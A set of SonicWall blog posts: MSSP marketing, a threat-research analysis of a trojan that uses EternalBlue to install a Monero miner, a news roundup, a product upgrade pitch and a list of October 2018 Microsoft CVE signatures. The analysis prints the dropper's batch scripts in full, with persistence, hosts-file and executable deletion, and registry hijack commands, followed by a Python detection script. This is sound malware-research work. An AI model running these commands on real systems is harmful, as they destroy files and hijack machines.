Protecting Your MSSP Reputation with Behavior-Based Security

You’ve been here before. Your customer gets hit by a cyberattack and they ask, “Why did this happen? Shouldn’t your managed security service have protected us?”

Unless you give them a satisfactory answer, they may be shopping for a new partner. Over the past few years, I’ve heard of several MSSPs having to explain to their customers that a malware or ransomware attack could not be stopped because they didn’t possess the technology to mitigate new attacks.

Don’t put yourself in a situation where you can’t properly safeguard your customers — even against new or unknown attacks. To protect both your customers and your reputation against the latest threats, you need to deploy behavior-based security solutions that can better future-proof your customer environment.

The Logistics of Threat Prevention

When talking with people about threat prevention, I ask, “How many new forms of malware do you think SonicWall detected last year?”

I usually hear answers in the thousands. The real answer? 56 million new forms or variants of malware in a single year. That’s more than 150,000 a day. Every day, security companies like SonicWall have teams of people creating signatures to help build in protections, but this takes time. Despite the industry’s best effort, static forms of threat elimination are limited.

Layering Security Across Customer Environments

MSSPs understand the importance of selling perimeter security, such as firewalls and email security, to scrub out most threats. These solutions will cover roughly 94-98 percent of threats. The remaining few percent are no less devastating, and this is where behavior-based solutions come into play.

On each edge-facing firewall and email security service you need to have a network sandbox, which is an isolated environment where files can be tested to understand their intended purpose or motive. For example, the SonicWall Capture Advanced Threat Protection (ATP) sandbox is an isolated environment that is designed to run suspicious files in parallel through multiple engines to resist evasive malware. With the ability to block a file until a verdict has been reached, you can ensure that you will deliver highly vetted and clean traffic to end users.

Endpoints require a form of security that continuously monitors the system for malicious behavior, because they roam outside the network perimeter and encounter fileless threats that arrive through vectors like malvertising.

SonicWall’s endpoint security solution (called Capture Client) only uses roughly 1 percent of the CPU’s processing power on a standard laptop. It can stop attacks before they happen as well as halt attacks as they execute. MSSPs love the ability to prevent dynamic attacks but also roll them back (on Windows only) in case they do initiate.

Behavior-based Security in Action

The power of behavior-based security was clear with the initial WannaCry attack in 2017. It was made famous when 16 NHS hospitals in the UK were shut down due to this viral ransomware attack. These sites were protected by a competitor whose CEO had to explain himself and apologize on national television.

The sites protected by SonicWall were up and running and helped pick up the slack when the others went down. Three weeks before the attack, SonicWall put protections in place that prevented Version 1 of WannaCry and its SMB vulnerability exploit from working.

But it was the behavior-based security controls that helped to identify and stop all the subsequent versions that came after. This same pattern emerged again with the NotPetya and SamSam ransomware attacks; static defenses followed by proactive dynamic defenses.

Furthermore, SonicWall’s reporting enables MSSPs to be alerted when something has been stopped. SonicWall Capture Client attack visualization gives administrators a view of where the threat came from and what it wanted to do on the endpoint.

This approach gives our customers — and MSSPs powered by SonicWall — the ability to protect against threats detected by SonicWall. But this strategy also protects against attacks that shift and change to bypass safeguards. By doing our best to build protections in a timely manner, as well as providing technology that detects and stops unknown attacks, we protect your customer as well as your reputation.


This story originally appeared on MSSP Alert and was republished with permission.

Trojan uses EternalBlue to install cryptominer

Interest in cryptocurrencies has not wavered despite a period of sinking market values. Cybercriminals are still ramping up efforts to obtain blockchain assets in the hope that their values will spike back up again in the future. While ransomware is still around, we have observed that cryptocurrency mining is increasingly being favored by cybercriminals as the method of choice for obtaining these cryptocurrencies. The premise is fairly simple: a machine gets infected by malware which stealthily uses its processing power to mine cryptocurrencies.

This week, the SonicWall Capture Labs Threat Research team has come across another Trojan that uses the leaked NSA exploit, EternalBlue, to install a cryptominer. This cryptominer even kills other known cryptomining processes that might be running on the victim’s machine to ensure exclusivity of the mining resource.

Infection Cycle:

The main installer’s icon impersonates a Chinese security product from 360.cn.

Upon execution, it creates a directory named “IIS” within the %Windir% folder and drops several files, including a suite of hack tools based on the leaked NSA exploits:

  • %Windir%\IIS\CPUInfo.exe
  • %Windir%\IIS\Doublepulsar-1.3.1.exe
  • %Windir%\IIS\Esteemaudit-2.1.0.exe
  • %Windir%\IIS\Esteemaudittouch-2.1.0.exe
  • %Windir%\IIS\Eternalblue-2.2.0.exe
  • %Windir%\IIS\Eternalchampion-2.0.0.exe
  • %Windir%\IIS\free.bat
  • %Windir%\IIS\demo.bat
  • %Windir%\IIS\demc.bat
  • %Windir%\IIS\x86.dll
  • %Windir%\IIS\x64.dll

CPUInfo.exe likewise carries its own icon. It is used to determine whether the machine is vulnerable, run the appropriate hack tool, and then install either x86.dll or x64.dll depending on the processor architecture.

To ensure persistence, demo.bat is executed to register scheduled tasks with the Task Scheduler: CPUInfo.exe is added as a task named “GooglePinginConfigs” that runs at system start, and free.bat as a task named “RavTask” that runs every 240 minutes, both under the SYSTEM account.

sc config Schedule start= auto
sc start Schedule
schtasks /delete /tn RavTask /f
schtasks /delete /tn GooglePinginConfigs /f
@schtasks /create /sc minute /mo 240 /tn "RavTask" /tr "C:\windows\IIS\free.bat" /ru "system" /f
@schtasks /create /tn "GooglePinginConfigs" /tr "C:\windows\IIS\CPUInfo.exe" /sc onstart /ru "system" /f
@C:\Windows\System32\attrib +s +h C:\WINDOWS\Tasks\RavTask.job
@C:\Windows\System32\attrib +s +h C:\WINDOWS\Tasks\GooglePinginConfigs.job
schtasks /run /tn "RavTask"
del %0

demc.bat is then executed. It terminates known (possibly rival) cryptominers and performs a slew of other malicious actions to take over the machine, including the following:

  • Denying access to ftp.exe using access controls and taking ownership of it
  • Deleting the hosts file
  • Clearing the DNS cache
  • Stopping and deleting services
  • Deleting all EXE files in the %ProgramFiles% directory

@wmic process where "name='server.exe' and ExecutablePath='C:\\program files (x86)\\stormii\\server.exe'" call Terminate
@md "C:\program files (x86)\stormii\server.exe"
echo y|cacls "C:\program files (x86)\stormii\server.exe" /d everyone
attrib +s +h +r +a "C:\program files (x86)\stormii"
echo y|cacls "C:\program files (x86)\stormii" /d everyone
@wmic process where "name='conhost.exe' and ExecutablePath='C:\\program files (x86)\\windows nt\\conhost.exe'" call Terminate
@del /s /q "C:\program files (x86)\windows nt\conhost.exe"
@sc delete SuperProServerST
taskkill /f /t /im ftp.exe
takeown /f %SystemRoot%\SysWOW64\ftp.exe /a
takeown /f %SystemRoot%\System32\ftp.exe /a
echo y|cacls %SystemRoot%\System32\ftp.exe /g users:f
echo y|cacls %SystemRoot%\SysWOW64\ftp.exe /g users:f
del %SystemRoot%\System32\ftp.exe
del %SystemRoot%\SysWOW64\ftp.exe
md %SystemRoot%\SysWOW64\ftp.exe
attrib +s +h +r %SystemRoot%\SysWOW64\ftp.exe
attrib +s +h +r %SystemRoot%\System32\ftp.exe
echo y|cacls %SystemRoot%\SysWOW64\ftp.exe /d everyone
echo y|cacls %SystemRoot%\System32\ftp.exe /d everyone
takeown /f %systemroot%\system32\Drivers\etc\hosts /a
echo y|cacls %systemroot%\system32\Drivers\etc\hosts /g users:f
attrib -s -h -a -r %systemroot%\system32\Drivers\etc\hosts
del /s /q %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 localhost>>%systemroot%\system32\drivers\etc\hosts
attrib +s +h +a +r %systemroot%\system32\Drivers\etc\hosts
@ipconfig /flushdns
@attrib -h -r -s -a C:\ProgramData
taskkill /f /t /im CPUInfo.exe
taskkill /f /t /im up.exe
taskkill /f /t /im block.exe
taskkill /f /t /im cpu.exe
@taskkill /f /t /im svshostr.exe
@sc stop xtfya
@sc delete xtfya
@sc stop "Network Support"
@sc delete "Network Support"
@sc stop "HomeGroup Support"
@sc delete "HomeGroup Support"
@sc stop xtfy
@sc delete xtfy
@sc stop Natioanl
@sc delete Natioanl
@sc stop Natihial
@sc delete Natihial
@sc stop "Interactive Services Detection Report"
@sc delete "Interactive Services Detection Report"
@sc stop "mssecsvc2.0"
@sc delete "mssecsvc2.0"
@sc stop "mssecsvc2.1"
@sc delete "mssecsvc2.1"
@sc stop ServiceMais
@sc delete ServiceMais
@sc stop ServiceMaims
@sc delete ServiceMaims
del /f /s /q %ProgramData%\*.exe
rd /s /q %ProgramData%\dll
md %ProgramData%\dll
attrib +s +h +r %ProgramData%\dll
echo y|cacls %ProgramData%\dll /d everyone
del /f /s /q C:\Progra~1\dll
md C:\Progra~1\dll
attrib +s +h +r C:\Progra~1\dll
echo y|cacls C:\Progra~1\dll /d everyone
md c:\wax.exe
attrib +s +h +r c:\wax.exe
echo y|cacls c:\wax.exe /d everyone
@echo y|cacls C:\ProgramData\Natihial\svshostr.exe /d everyone
@echo y|cacls C:\ProgramData\Microsoft\Natihial\cmd.exe /d everyone
echo y|cacls C:\ProgramData\expl0rer.exe /d everyone
@echo y|cacls C:\windows\svchost.exe /d everyone
@Wmic Process Where "Name='cmd.exe' And ExecutablePath='C:\\ProgramData\\Microsoft\\Natihial\\cmd.exe'" Call Terminate
@schtasks /delete /tn "Adobe Flash Player Updaters" /f
@wmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\svchost.exe'" call Terminate
@wmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\dll\\svchost.exe'" call Terminate
@wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\dll\\csrss.exe'" call Terminate
@wmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\Natioanl\\svchostr.exe'" call Terminate
@wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\Natioanl\\csrss..exe'" call Terminate
@wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\nm\\winlogin.exe'" call Terminate
md %SystemRoot%\svchost.exe
attrib +s +h +r %SystemRoot%\svchost.exe
echo y|cacls %SystemRoot%\svchost.exe /d everyone
taskkill /f /t /im tasksche.exe
md %SystemRoot%\tasksche.exe
attrib +s +h +r %SystemRoot%\tasksche.exe
echo y|cacls %SystemRoot%\tasksche.exe /d everyone
taskkill /f /t /im srvany.exe
md %SystemRoot%\srvany.exe
attrib +s +h +r %SystemRoot%\srvany.exe
echo y|cacls %SystemRoot%\srvany.exe /d everyone
taskkill /f /t /im WUDHostServices.exe
md %SystemRoot%\System32\WUDHostServices.exe
attrib +s +h +r %SystemRoot%\System32\WUDHostServices.exe
echo y|cacls %SystemRoot%\System32\WUDHostServices.exe /d everyone
@taskkill /f /im wbmoney.exe
@taskkill /f /im GGtbviewer.exe
taskkill /f /t /im Netohad.pif
taskkill /f /t /im Qrhkveb.com
taskkill /f /t /im Tnntknl.com
taskkill /f /t /im Snwhtdw.bat
taskkill /f /t /im dllhsot.exe
taskkill /f /t /im Tasksvr.exe
taskkill /f /t /im serices.exe
taskkill /f /t /im seever.exe
taskkill /f /t /im mssecsvc.exe
taskkill /f /t /im svchsot.exe
taskkill /f /t /im lsacs.exe
taskkill /f /t /im nsa.exe
taskkill /f /t /im csrs.exe
taskkill /f /im WerFault.exe
taskkill /f /im WScript.exe
taskkill /f /t /im NV-NO.exe
taskkill /f /t /im NV.exe
taskkill /f /t /im Eternalblue-2.2.0.exe
taskkill /f /t /im Eternalchampion-2.0.0.exe
taskkill /f /t /im Doublepulsar-1.3.1.exe
@wmic process where "name='explorer.exe' and ExecutablePath='C:\\Windows\\system\\explorer.exe'" call Terminate
@wmic process where "name='explorer.exe' and ExecutablePath='C:\\Windows\\Fonts\\explorer.exe'" call Terminate
@wmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\Fonts\\conhost.exe'" call Terminate
@reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smss.exe" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundllhost.exe" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sc.exe" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\schtasks.exe" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wax.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Systmss.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ystmss.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wuauc1t.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\2.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\1.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nanol.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchostr.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss..exe" /v "debugger" /d taskkill.exe /f
@del /q C:\Windows\system\explorer.exe
@del /q C:\Windows\Fonts\explorer.exe
@taskkill /f /t /im lservice.exe
@taskkill /f /t /im ystmss.exe
@taskkill /f /t /im wuauc1t.exe
del %0

free.bat is then executed as a final cleanup of the install process.


@ECHO OFF
ping -n 2 127.0.0.1>nul
taskkill /f /t /im NV-NO.exe
taskkill /f /t /im NV.exe
taskkill /f /t /im Eternalblue-2.2.0.exe
taskkill /f /t /im Eternalchampion-2.0.0.exe
taskkill /f /t /im Doublepulsar-1.3.1.exe
taskkill /f /im mysqld.exe
taskkill /f /im CPUInfo.exe
taskkill /f /im jvav.exe
ping -n 5 127.0.0.1>nul
schtasks /run /tn "GooglePinginConfigs"
exit

The loaded x64.dll and x86.dll are then responsible for downloading two more components, Install.exe and mado.exe. Install.exe simply reinstalls CPUInfo.exe, so the whole CPUInfo.exe execution cycle restarts and persistence is guaranteed.

mado.exe goes to bmw.hobuff.info and downloads another file, which is the main cryptominer. This cryptominer disguises itself as another 360.cn component and uses the same icon as the main installer above. Upon careful examination we find that it mines Monero cryptocurrency and is based on the open-source XMRig CPU miner.
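As an added example (not code from the original post or from SonicWall), the following Python script performs a static triage of a batch dropper in the style of demo.bat and demc.bat above: it flags SYSTEM-level scheduled-task persistence, hidden .job files, IFEO “debugger” entries that point at taskkill.exe, cacls denial on system binaries, hosts-file tampering, service removal, the rival-process kill list and self-deletion, then turns the hits into a verdict. The sample lines are constructed from the behaviour described above, and the rule names, weights and thresholds are assumptions made for this example.

```python
"""Static triage of a Windows batch dropper modelled on the demo.bat / demc.bat
behaviour described in the write-up above. The sample is constructed, not a
captured file, and the scoring scheme is an assumption for this example."""
import re
from collections import defaultdict

# Constructed excerpt in the style of demo.bat / demc.bat (not the real files).
SAMPLE_BAT = r"""
@echo off
sc config Schedule start= auto
@schtasks /create /tn "GooglePinginConfigs" /tr "C:\windows\IIS\CPUInfo.exe" /sc onstart /ru "system" /f
@C:\Windows\System32\attrib +s +h C:\WINDOWS\Tasks\GooglePinginConfigs.job
takeown /f %SystemRoot%\System32\ftp.exe /a
echo y|cacls %SystemRoot%\System32\ftp.exe /d everyone
del /s /q %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 localhost>>%systemroot%\system32\drivers\etc\hosts
@ipconfig /flushdns
@sc stop "mssecsvc2.0"
@sc delete "mssecsvc2.0"
taskkill /f /t /im Eternalblue-2.2.0.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wax.exe" /v "debugger" /d taskkill.exe /f
del /f /s /q %ProgramData%\*.exe
del %0
"""

# (behaviour, weight, pattern). Weights are assumptions chosen so that persistence
# plus defence evasion outranks a long but otherwise unremarkable kill list.
# A capture group, where present, extracts the artefact (task, binary, path).
RULES = [
    ("persistence_schtask_system", 3,
     r'schtasks\s+/create\b.*?/tn\s+"?([^"\s]+)"?.*?/ru\s+"?system"?'),
    ("ifeo_debugger_hijack", 3,
     r'reg\s+add\s+".*?Image File Execution Options\\([^"\\]+)".*?/v\s+"?debugger"?'),
    ("hide_task_job", 2, r'attrib\s+\+s\s+\+h\s+.*\\Tasks\\(\S+\.job)'),
    ("acl_deny_everyone", 2, r'cacls\s+(\S+)\s+/d\s+everyone'),
    ("hosts_file_tamper", 2, r'drivers\\etc\\hosts'),
    ("mass_delete_exe", 2, r'del\s+/f\s+/s\s+/q\s+\S*\\\*\.exe'),
    ("takeown_system_binary", 1, r'takeown\s+/f\s+(\S+)'),
    ("service_removal", 1, r'sc\s+delete\s+"?([^"\s]+)"?'),
    ("process_kill", 1, r'taskkill\b.*?/im\s+(\S+)'),
    ("self_delete", 1, r'^del\s+%0\s*$'),
]
COMPILED = [(name, w, re.compile(rx, re.I)) for name, w, rx in RULES]
WEIGHTS = {name: w for name, w, _ in RULES}


def normalise(raw):
    """Trim whitespace and the leading '@' that batch uses to suppress command echo."""
    return raw.strip().lstrip("@").strip()


def triage(script):
    """Map each behaviour name to the artefacts (task names, binaries, paths) it touched."""
    hits = defaultdict(list)
    for raw in script.splitlines():
        line = normalise(raw)
        if not line:
            continue
        for name, _, rx in COMPILED:
            m = rx.search(line)
            if m:
                hits[name].append(m.group(1) if m.groups() else line)
    return dict(hits)


def score(hits):
    """Count each behaviour once, so a 100-line kill list cannot outweigh persistence."""
    return sum(WEIGHTS[name] for name in hits)


def verdict(total):
    """Thresholds are assumptions for this example, not a vendor scoring scheme."""
    if total >= 8:
        return "dropper"
    if total >= 4:
        return "suspicious"
    return "benign-looking"


if __name__ == "__main__":
    found = triage(SAMPLE_BAT)
    for name, artefacts in found.items():
        print(f"{name:28s} {artefacts}")
    total = score(found)
    print(f"score={total} verdict={verdict(total)}")
```

Running the script against a dropped .bat recovered from %Windir%\IIS would list the task names, hijacked image names and denied paths that an incident responder needs to undo (delete the tasks, remove the IFEO keys, restore ACLs and the hosts file).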

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Downloader.AL_5 (Trojan)
  • GAV: Reconyc.DDA_5 (Trojan)
  • GAV: Madominer.D (Trojan)
  • GAV: Madominer.D_2 (Trojan)
  • GAV: Equation.A (Trojan)
  • GAV: XMRig.XMR_3 (Trojan)

Cyber Security News & Trends – 10-12-18

Each week, SonicWall collects the cyber security industry’s most compelling, trending and important interviews, media and news stories — just for you.


SonicWall Spotlight

“A leader has to be passionate about their work be able to motivate their teams to be equally passionate” With Bill Conner – Authority Magazine

  • Bill Conner, CEO of SonicWall, is interviewed about his career, from his days loading shipping containers all the way to his current role.

Cryptomining Malware Steals Fortnite Gamers’ Bitcoins and Personal Data – SC Magazine (UK)

  • As malware continues to target Fortnite players, SonicWall’s Lawrence Pingree talks about the probable future of kinetic ransomware.

Chart of the Day: Google Plus Never Got off the Ground – Real Money

  • SonicWall CEO Bill Conner weighs in with his thoughts on the importance, or not, of the Google Plus breach.

Cyber Security News

Pentagon Struggling to Meet Cyber Challenges, as Modern Warfare Goes High Tech – The Washington Times

  • The Pentagon wants to avoid another “Beast of Kandahar” situation but is struggling to keep its cybersecurity stronger than its attackers.

New Evidence of Hacked Supermicro Hardware Found in U.S. Telecom – Bloomberg

  • Accusations that China is inserting spying chips into US companies’ hardware are still being made and are spreading to other companies.

Medtronic Disables Pacemaker Programmer Updates Over Hack Concern – Reuters

  • There have been no documented reports of the vulnerability being exploited, but the company is taking no chances with people’s hearts.

Vietnam Cyber Law Set for Tough Enforcement Despite Google, Facebook Pleas – Reuters

  • Companies will be required to store a wide range of user data and set up offices inside the country.

Heathrow Airport Fined £120,000 Over USB Data Breach Debacle – ZDNet

  • A memory stick with unencrypted private data of airport employees was found by a member of the public last year.

Payment-Card-Skimming Magecart Strikes Again: Zero out of Five for Infecting E-Retail Sites – The Register (UK)

  • The British Airways and Ticketmaster attacking toolkit Magecart isn’t going away, this time turning up in a plugin called Shopper Approved that is used by hundreds of e-commerce sites.

This Cryptojacking Mining Malware Pretends to Be a Flash Update – ZDNet

  • The much-maligned Flash software now has the added problem of an imposter program that uses a victim’s computer to mine for the Monero cryptocurrency.

In Case You Missed It

12 Smart Reasons to Upgrade to SonicWall Secure Mobile Access (SMA)

The modern mobile or remote workforce is one of a business’s most valuable resources. Ensuring users have fast and secure anytime, anywhere access to applications, services and networks is a business-critical function.

For many years, the SonicWall Secure Remote Access (SRA) solution was the workhorse for distributed or remote personnel across the world. But technology moves fast. Today’s business environment has more users, applications and services than ever before. Satisfying this need requires a secure, high-performance remote access solution.

That’s why SonicWall introduced Secure Mobile Access (SMA), a unified secure access gateway that enables organizations to provide anytime, anywhere and any-device access to any application. More memory. More users. More throughput.

The solution’s granular access control policy engine, context-aware device authorization, application-level VPN and advanced authentication with single sign-on enable organizations to move to the cloud with ease, and embrace BYOD and mobility in a hybrid IT environment.

Explore the top 12 reasons organizations are upgrading to SonicWall SMA to deliver the speed, security and user experiences their mobile workforces require.

Shrink Budgets by Going Virtual

Virtualizing your infrastructure provides many benefits, while significantly improving performance needed for today’s secure mobility. Improvements include enhanced scalability and flexibility, reduction in downtime, minimized upfront investment and lower maintenance costs.

Why upgrade: SMA 8200v is a powerful virtual appliance with a quad-core processor and 8 Gb RAM. It delivers high-performance secure remote access — all at a fraction of the cost of a physical appliance.

Go Faster

Having both more and faster processing cores enables SMA to encrypt data-in-motion and with lower latency. The end result is a faster, high-performance experience for end users.

Why upgrade: The SMA series has quad core processors that run at up to 1.8 times the speed of those on the SRA series (single core on EX6000 and dual core on EX7000).

Increase Your Throughput

While speed is important, the ultimate goal is to deliver a seamless user experience. By increasing throughput, you promote better productivity with fast and secure access to mission-critical cloud and on-premises applications.

Why upgrade: SMA appliances have up to 15 times the SSL-VPN throughput of the SRA EX series (1.58 Gbps/400 Mbps/3.75 Gbps vs. 106 Mbps/550Mbps).

Serve More Concurrent Users

The mobile workforce has matured quickly in the past decade. Businesses are serving more remote users than ever before — and usually at the same time. Having a higher number of concurrent user sessions provides greater scalability by enabling more simultaneous user sessions to be active and tracked by firewalls.

Why upgrade: The SMA series offers more scalability from a single appliance for larger numbers of concurrent user sessions compared to the SRA series.

Get More High-Speed Ports

Today’s applications and cloud services are bandwidth hogs. Whether users are accessing sales data from a SaaS application or streaming a video presentation, organizations need the throughput to support bandwidth-intensive applications and high-speed data transfers.

Why upgrade: SMA 8200v supports two 10-GbE ports and SMA 7200 includes two 10-GbE ports out of the box.

Keep Features, Firmware Current

One of the most important best practices to defend against cyberattack or unknown threats is to always keep patches current. This habit also ensures you’re getting the latest feature updates to take advantage of new capabilities that help reduce costs while embracing trends such as BYOD, mobility and cloud.

Why upgrade: Every SMA firmware version is packed with new features. For example, SMA OS 12.1 is the current recommended firmware that provides advanced features, such as:

  • Federated Single Sign-On (SSO)
  • Face ID AUTH Support
  • Centralized Access Portal for Hybrid IT
  • File-Scanning via SonicWall Capture ATP Sandbox Service

Retain Support, Warranty for Hardware

Delivering secure remote access is a critical IT function that reduces attack surface for cybercriminals. It is imperative that the solution is always fully supported and has a best-in-class warranty — should the need arise.

Why upgrade: The SRA series is approaching End of Life (EOL) and the appliances will not be supported beyond November 2019.

Centralize Management & Reporting

Management and technology oversight are significant cost centers for businesses. By centralizing management and reporting, and automating routine tasks, organizations can drastically reduce administrative overhead. That’s time better spent on core business or security objectives.

Why upgrade: SonicWall Central Management Server (CMS) provides organizations with a single administrative user interface for reporting and management of all SMA appliances. This even includes SSL certificate management and policy roll-outs.

Enhance Resilience & Availability

Downtime happens. But organizations do their best to ensure business continuity and scalability, not to mention that service-level agreements are being met. Service providers vastly improve Quality of Service (QoS) and workforce productivity by being proactive in this area.

Why upgrade: Appliances managed by CMS can be configured as Active/Active or Active/Standby high-availability (HA) clusters for redundancy, availability and reliability. The solution includes Global Traffic Optimizer (GTO) for intelligent load-balancing and universal session persistence in case of failovers.

Store Critical Information with Onboard Memory

While much storage today is outsourced to clouds or servers, having large onboard modules is still a key capability. It allows for the local storage of logs, reports, file transfer inspection, firmware backups and restores, and more.

Why upgrade: The SMA 6200 and 7200 offer storage modules that have 12.5 times the capacity of the SRA series (2 x 500 GB vs. 80 GB).

Reduce Costs by Maximizing Global Usage

Organizations with appliances that are globally distributed can benefit from the fluctuating demands for user licenses due to time differences from off‐work/night hours.

Why upgrade: User licenses no longer need to be applied to individual SMA appliances. With central user licensing, CMS reallocates licenses to managed SMA appliances based on usage.

About SonicWall SMA

SMA is an advanced access security gateway that offers secure access to network and cloud resources from any device. SMA provides centralized, granular, policy-based enforcement of remote and mobile access to any corporate resource delivered using a hardened Linux-based appliance. Available as hardened physical appliances or powerful virtual appliances, SMA fits seamlessly into any existing IT infrastructure.

Microsoft Security Bulletin Coverage for October 2018

SonicWall Capture Labs Threat Research Team has analyzed and addressed Microsoft’s security advisories for the month of October 2018. A list of the issues reported, along with SonicWall coverage information, follows:

CVE-2010-3190 MFC Insecure Library Loading Vulnerability
There are no known exploits in the wild.
CVE-2018-8265 Microsoft Exchange Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8320 Windows DNS Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8329 Linux On Windows Elevation Of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8330 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8333 Microsoft Filter Manager Elevation Of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8411 NTFS Elevation of Privilege Vulnerability
ASPY 5282 : Malformed-File exe.MP.38
CVE-2018-8413 Windows Theme API Remote Code Execution Vulnerability
ASPY 5283 : Malformed-File theme.MP
CVE-2018-8423 Microsoft JET Database Engine Remote Code Execution Vulnerability
ASPY 5271 : Malformed-File mdb.TL.4
ASPY 5272 : Malformed-File mdb.TL.5
CVE-2018-8427 Microsoft Graphics Components Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8432 Microsoft Graphics Components Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8448 Microsoft Exchange Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8453 Win32k Elevation of Privilege Vulnerability
ASPY 5284 : Malformed-File exe.MP.39
CVE-2018-8460 Internet Explorer Memory Corruption Vulnerability
IPS 13639 : Internet Explorer Memory Corruption Vulnerability (OCT 18) 1
CVE-2018-8472 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8473 Microsoft Edge Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8480 Microsoft SharePoint Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8481 Windows Media Player Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8482 Windows Media Player Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8484 DirectX Graphics Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8486 DirectX Information Disclosure Vulnerability
IPS 5285 : Malformed-File exe.MP.40
CVE-2018-8488 Microsoft SharePoint Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8489 Windows Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8490 Windows Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8491 Internet Explorer Memory Corruption Vulnerability
IPS 13640 : Internet Explorer Memory Corruption Vulnerability (OCT 18) 2
CVE-2018-8492 Device Guard Code Integrity Policy Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8493 Windows TCP/IP Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8494 MS XML Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8495 Windows Shell Remote Code Execution Vulnerability
IPS 13637 : Windows Shell Remote Code Execution Vulnerability (OCT 18) 1
CVE-2018-8497 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8498 Microsoft SharePoint Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8500 Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8501 Microsoft PowerPoint Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8502 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8503 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8504 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8505 Chakra Scripting Engine Memory Corruption Vulnerability
IPS 13636 : Chakra Scripting Engine Memory Corruption Vulnerability (OCT 18) 1
CVE-2018-8506 Microsoft Windows Codecs Library Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8509 Microsoft Edge Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8510 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8511 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8512 Microsoft Edge Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8513 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8518 Microsoft SharePoint Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8527 SQL Server Management Studio Information Disclosure Vulnerability
There are no known exploits in the wild.
